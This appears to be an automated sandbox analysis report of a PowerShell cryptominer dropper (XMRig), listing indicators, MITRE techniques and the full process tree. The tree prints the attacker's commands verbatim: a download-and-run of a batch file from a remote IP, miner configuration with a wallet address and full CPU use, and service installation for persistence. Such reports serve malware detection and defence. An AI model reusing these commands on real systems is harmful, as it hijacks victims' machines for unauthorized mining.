xmrig | 81ffd1889d598ab1faa4d19e9ddb836cfff5a6cbf69e9e5d49f428cbf5591654

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
05-07-2024 09:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

81ffd1889d598ab1faa4d19e9ddb836cfff5a6cbf69e9e5d49f428cbf5591654.ps1
Size

148B
MD5

84514beafcf32e181fd4d3663580554a
SHA1

7841d69d2f8e2d68fa9f83e58c0bf69901c94fc2
SHA256

81ffd1889d598ab1faa4d19e9ddb836cfff5a6cbf69e9e5d49f428cbf5591654
SHA512

32b854f84f00257de19900fce226b28a739987a38f108c1f815993c8b4c3711b5ce83c4a28ea73d3b9810eeb3d27da844d24342ce48d7468200fd3edac282fc0

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral2/files/0x00070000000234fa-78.dat	family_xmrig
behavioral2/files/0x00070000000234fa-78.dat	xmrig
behavioral2/memory/2036-81-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-216-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-218-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-227-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4064-228-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	1420	powershell.exe
9	1552	powershell.exe
11	4704	powershell.exe
13	4512	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
2036	xmrig.exe
4444	nssm.exe
2160	nssm.exe
1716	nssm.exe
2236	nssm.exe
4644	nssm.exe
4888	nssm.exe
2592	nssm.exe
4064	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
11	raw.githubusercontent.com
13	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3984	sc.exe
3856	sc.exe
3020	sc.exe
1508	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1552	powershell.exe
4736	powershell.exe
1192	powershell.exe
1364	powershell.exe
2800	powershell.exe
4512	powershell.exe
3044	powershell.exe
1420	powershell.exe
4704	powershell.exe
3024	powershell.exe
4708	powershell.exe
4376	powershell.exe
5028	powershell.exe
1140	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
3980	timeout.exe
3224	timeout.exe
3716	timeout.exe
4652	timeout.exe
4252	timeout.exe
2952	timeout.exe
4532	timeout.exe
3420	timeout.exe
4444	timeout.exe
4472	timeout.exe
400	timeout.exe
3136	timeout.exe
5076	timeout.exe
1032	timeout.exe
5004	timeout.exe
3228	timeout.exe
1720	timeout.exe
4128	timeout.exe
3980	timeout.exe
3892	timeout.exe
5012	timeout.exe
1044	timeout.exe
4312	timeout.exe
1588	timeout.exe
4016	timeout.exe
5088	timeout.exe
2208	timeout.exe
4104	timeout.exe
3020	timeout.exe
5028	timeout.exe
1904	timeout.exe
4368	timeout.exe
2444	timeout.exe
4896	timeout.exe
5092	timeout.exe
4744	timeout.exe
5072	timeout.exe
3228	timeout.exe
4624	timeout.exe
1216	timeout.exe
2196	timeout.exe
1456	timeout.exe
4508	timeout.exe
3528	timeout.exe
5084	timeout.exe
4116	timeout.exe
2508	timeout.exe
5072	timeout.exe
2172	timeout.exe
3688	timeout.exe
3620	timeout.exe
3080	timeout.exe
1748	timeout.exe
4016	timeout.exe
2452	timeout.exe
3836	timeout.exe
2424	timeout.exe
3208	timeout.exe
2032	timeout.exe
3668	timeout.exe
764	timeout.exe
4148	timeout.exe
4620	timeout.exe
4508	timeout.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3280	taskkill.exe
2224	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
1420	powershell.exe
1420	powershell.exe
1552	powershell.exe
1552	powershell.exe
4704	powershell.exe
4704	powershell.exe
3024	powershell.exe
3024	powershell.exe
4708	powershell.exe
4708	powershell.exe
4736	powershell.exe
4736	powershell.exe
1192	powershell.exe
1192	powershell.exe
1364	powershell.exe
1364	powershell.exe
4376	powershell.exe
4376	powershell.exe
3044	powershell.exe
3044	powershell.exe
2800	powershell.exe
2800	powershell.exe
5028	powershell.exe
5028	powershell.exe
4512	powershell.exe
4512	powershell.exe
1140	powershell.exe
1140	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	3280	taskkill.exe
Token: SeDebugPrivilege	1552	powershell.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeDebugPrivilege	4704	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	4376	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	1140	powershell.exe
Token: SeLockMemoryPrivilege	4064	xmrig.exe
Token: SeIncreaseQuotaPrivilege	3776	WMIC.exe
Token: SeSecurityPrivilege	3776	WMIC.exe
Token: SeTakeOwnershipPrivilege	3776	WMIC.exe
Token: SeLoadDriverPrivilege	3776	WMIC.exe
Token: SeSystemProfilePrivilege	3776	WMIC.exe
Token: SeSystemtimePrivilege	3776	WMIC.exe
Token: SeProfSingleProcessPrivilege	3776	WMIC.exe
Token: SeIncBasePriorityPrivilege	3776	WMIC.exe
Token: SeCreatePagefilePrivilege	3776	WMIC.exe
Token: SeBackupPrivilege	3776	WMIC.exe
Token: SeRestorePrivilege	3776	WMIC.exe
Token: SeShutdownPrivilege	3776	WMIC.exe
Token: SeDebugPrivilege	3776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3776	WMIC.exe
Token: SeRemoteShutdownPrivilege	3776	WMIC.exe
Token: SeUndockPrivilege	3776	WMIC.exe
Token: SeManageVolumePrivilege	3776	WMIC.exe
Token: 33	3776	WMIC.exe
Token: 34	3776	WMIC.exe
Token: 35	3776	WMIC.exe
Token: 36	3776	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3776	WMIC.exe
Token: SeSecurityPrivilege	3776	WMIC.exe
Token: SeTakeOwnershipPrivilege	3776	WMIC.exe
Token: SeLoadDriverPrivilege	3776	WMIC.exe
Token: SeSystemProfilePrivilege	3776	WMIC.exe
Token: SeSystemtimePrivilege	3776	WMIC.exe
Token: SeProfSingleProcessPrivilege	3776	WMIC.exe
Token: SeIncBasePriorityPrivilege	3776	WMIC.exe
Token: SeCreatePagefilePrivilege	3776	WMIC.exe
Token: SeBackupPrivilege	3776	WMIC.exe
Token: SeRestorePrivilege	3776	WMIC.exe
Token: SeShutdownPrivilege	3776	WMIC.exe
Token: SeDebugPrivilege	3776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3776	WMIC.exe
Token: SeRemoteShutdownPrivilege	3776	WMIC.exe
Token: SeUndockPrivilege	3776	WMIC.exe
Token: SeManageVolumePrivilege	3776	WMIC.exe
Token: 33	3776	WMIC.exe
Token: 34	3776	WMIC.exe
Token: 35	3776	WMIC.exe
Token: 36	3776	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2144	WMIC.exe
Token: SeSecurityPrivilege	2144	WMIC.exe
Token: SeTakeOwnershipPrivilege	2144	WMIC.exe
Token: SeLoadDriverPrivilege	2144	WMIC.exe
Token: SeSystemProfilePrivilege	2144	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4064	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1420 wrote to memory of 4300	1420	powershell.exe	84
PID 1420 wrote to memory of 4300	1420	powershell.exe	84
PID 4300 wrote to memory of 3280	4300	cmd.exe	86
PID 4300 wrote to memory of 3280	4300	cmd.exe	86
PID 4300 wrote to memory of 1552	4300	cmd.exe	88
PID 4300 wrote to memory of 1552	4300	cmd.exe	88
PID 1552 wrote to memory of 1712	1552	powershell.exe	89
PID 1552 wrote to memory of 1712	1552	powershell.exe	89
PID 1712 wrote to memory of 3736	1712	cmd.exe	90
PID 1712 wrote to memory of 3736	1712	cmd.exe	90
PID 3736 wrote to memory of 3908	3736	net.exe	91
PID 3736 wrote to memory of 3908	3736	net.exe	91
PID 1712 wrote to memory of 3936	1712	cmd.exe	92
PID 1712 wrote to memory of 3936	1712	cmd.exe	92
PID 1712 wrote to memory of 1928	1712	cmd.exe	93
PID 1712 wrote to memory of 1928	1712	cmd.exe	93
PID 1712 wrote to memory of 4520	1712	cmd.exe	94
PID 1712 wrote to memory of 4520	1712	cmd.exe	94
PID 1712 wrote to memory of 4476	1712	cmd.exe	95
PID 1712 wrote to memory of 4476	1712	cmd.exe	95
PID 1712 wrote to memory of 4924	1712	cmd.exe	96
PID 1712 wrote to memory of 4924	1712	cmd.exe	96
PID 1712 wrote to memory of 3984	1712	cmd.exe	97
PID 1712 wrote to memory of 3984	1712	cmd.exe	97
PID 1712 wrote to memory of 3856	1712	cmd.exe	98
PID 1712 wrote to memory of 3856	1712	cmd.exe	98
PID 1712 wrote to memory of 2224	1712	cmd.exe	99
PID 1712 wrote to memory of 2224	1712	cmd.exe	99
PID 1712 wrote to memory of 4704	1712	cmd.exe	100
PID 1712 wrote to memory of 4704	1712	cmd.exe	100
PID 1712 wrote to memory of 3024	1712	cmd.exe	101
PID 1712 wrote to memory of 3024	1712	cmd.exe	101
PID 1712 wrote to memory of 4708	1712	cmd.exe	102
PID 1712 wrote to memory of 4708	1712	cmd.exe	102
PID 1712 wrote to memory of 2036	1712	cmd.exe	103
PID 1712 wrote to memory of 2036	1712	cmd.exe	103
PID 1712 wrote to memory of 64	1712	cmd.exe	104
PID 1712 wrote to memory of 64	1712	cmd.exe	104
PID 64 wrote to memory of 4736	64	cmd.exe	105
PID 64 wrote to memory of 4736	64	cmd.exe	105
PID 4736 wrote to memory of 4112	4736	powershell.exe	106
PID 4736 wrote to memory of 4112	4736	powershell.exe	106
PID 1712 wrote to memory of 1192	1712	cmd.exe	107
PID 1712 wrote to memory of 1192	1712	cmd.exe	107
PID 1712 wrote to memory of 1364	1712	cmd.exe	108
PID 1712 wrote to memory of 1364	1712	cmd.exe	108
PID 1712 wrote to memory of 4376	1712	cmd.exe	109
PID 1712 wrote to memory of 4376	1712	cmd.exe	109
PID 1712 wrote to memory of 3044	1712	cmd.exe	110
PID 1712 wrote to memory of 3044	1712	cmd.exe	110
PID 1712 wrote to memory of 2800	1712	cmd.exe	111
PID 1712 wrote to memory of 2800	1712	cmd.exe	111
PID 1712 wrote to memory of 5028	1712	cmd.exe	112
PID 1712 wrote to memory of 5028	1712	cmd.exe	112
PID 1712 wrote to memory of 4512	1712	cmd.exe	113
PID 1712 wrote to memory of 4512	1712	cmd.exe	113
PID 1712 wrote to memory of 1140	1712	cmd.exe	114
PID 1712 wrote to memory of 1140	1712	cmd.exe	114
PID 1712 wrote to memory of 3020	1712	cmd.exe	115
PID 1712 wrote to memory of 3020	1712	cmd.exe	115
PID 1712 wrote to memory of 1508	1712	cmd.exe	116
PID 1712 wrote to memory of 1508	1712	cmd.exe	116
PID 1712 wrote to memory of 4444	1712	cmd.exe	117
PID 1712 wrote to memory of 4444	1712	cmd.exe	117

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\81ffd1889d598ab1faa4d19e9ddb836cfff5a6cbf69e9e5d49f428cbf5591654.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\script_eab6ab72.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4300
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK; Remove-Item -Force $tempfile"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9A0D.tmp.bat" 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1712
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3736
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:3908
    - - C:\Windows\system32\where.exe
        
        where powershell
        5⤵
        
        PID:3936
    - - C:\Windows\system32\where.exe
        
        where find
        5⤵
        
        PID:1928
    - - C:\Windows\system32\where.exe
        
        where findstr
        5⤵
        
        PID:4520
    - - C:\Windows\system32\where.exe
        
        where tasklist
        5⤵
        
        PID:4476
    - - C:\Windows\system32\where.exe
        
        where sc
        5⤵
        
        PID:4924
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:3984
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:3856
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /t /im xmrig.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2224
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4704
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3024
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4708
    - - C:\Users\Admin\moneroocean\xmrig.exe
        
        "C:\Users\Admin\moneroocean\xmrig.exe" --help
        5⤵
        Executes dropped EXE
        
        PID:2036
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:64
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4736
        
        C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        7⤵
        
        PID:4112
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1192
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1364
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Mppnghqz\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4376
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3044
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2800
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5028
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4512
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1140
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:3020
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:1508
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
        5⤵
        Executes dropped EXE
        
        PID:4444
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
        5⤵
        Executes dropped EXE
        
        PID:2160
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
        5⤵
        Executes dropped EXE
        
        PID:1716
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
        5⤵
        Executes dropped EXE
        
        PID:2236
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
        5⤵
        Executes dropped EXE
        
        PID:4644
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
        5⤵
        Executes dropped EXE
        
        PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3776
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2144
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4340
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5024
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2556
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3944
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4780
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2016
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1504
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3228
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4196
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:404
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4216
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3796
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3936
